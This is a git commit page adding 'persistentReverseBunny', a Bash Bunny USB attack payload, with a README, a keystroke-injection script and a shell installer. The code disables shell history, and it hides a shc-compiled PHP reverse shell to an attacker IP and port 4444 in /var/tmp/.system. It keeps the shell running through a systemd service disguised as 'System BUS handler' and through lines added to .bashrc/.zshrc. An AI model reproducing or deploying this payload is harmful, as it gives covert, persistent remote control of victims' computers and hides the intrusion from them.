persistentReverseBunny (#515)
* persistentReverseBunny Added obfuscation layer by completely encoding reverse shell mechanism. * fixing typo * adding payloadpull/518/head
parent
bd4ec90d04
commit
797cf561d5
|
@ -0,0 +1,36 @@
|
|||
## About:
|
||||
* Title: persistentReverseBunny
|
||||
* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Remote Access
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, STORAGE
|
||||
|
||||
## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs.
|
||||
|
||||
### Workflow:
|
||||
Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell.
|
||||
|
||||
### Algorithm:
|
||||
1. Stop storing history, this helps to keep tracks clear from begining.
|
||||
2. Creating reverse shell.
|
||||
3. Creating non-root systemd service.
|
||||
4. Enabling service.
|
||||
5. Starting service on trigger of firing terminal emulator/shell.
|
||||
|
||||
### LED Status:
|
||||
* `SETUP` : MAGENTA
|
||||
* `ATTACK` : YELLOW
|
||||
* `FINISH` : GREEN
|
||||
|
||||
### Directory Structure of payload components:
|
||||
| FileName | Directory |
|
||||
| ----------------------- | ----------------------------- |
|
||||
| payload.txt | /payloads/switch1/ |
|
||||
| persistentReverseBunny/ | /payloads/libray/ |
|
||||
|
||||
### Note:
|
||||
* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`.
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,51 @@
|
|||
# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Remote Access
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh \&
|
||||
Q ENTER
|
||||
Q STRING disown
|
||||
Q ENTER
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,18 @@
|
|||
#!/bin/bash
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
mkdir /var/tmp/.system/
|
||||
echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop
|
||||
cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/
|
||||
chmod +x /var/tmp/.system/shc
|
||||
/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
rm /var/tmp/.system/pop*
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc
|
Binary file not shown.
Loading…
Reference in New Issue